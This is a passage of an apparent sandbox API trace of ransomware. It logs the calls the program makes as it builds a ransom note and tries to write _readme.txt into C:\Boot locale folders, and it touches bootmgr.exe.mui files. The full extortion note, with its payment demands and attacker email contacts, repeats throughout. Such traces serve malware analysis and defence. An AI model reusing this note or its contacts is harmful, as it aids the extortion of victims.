e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.880] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.880] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.880] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.880] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0228.880] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.880] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.880] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.880] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.880] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0228.880] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.881] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.881] PathFindFileNameW (pszPath="") returned="" [0228.881] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.881] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.881] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.881] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.881] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0228.881] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0228.881] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.881] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.881] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.882] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.882] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0228.882] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.882] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.882] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.882] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.882] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0228.882] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.882] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.882] PathFindFileNameW (pszPath="") returned="" [0228.882] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.883] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.883] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.883] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.883] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0228.883] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0228.883] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.883] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.883] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.884] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.884] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0228.884] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.884] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.884] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.884] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.884] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0228.884] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.884] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.884] PathFindFileNameW (pszPath="") returned="" [0228.884] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.885] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.885] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.885] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.885] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0228.885] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0228.885] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.885] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like 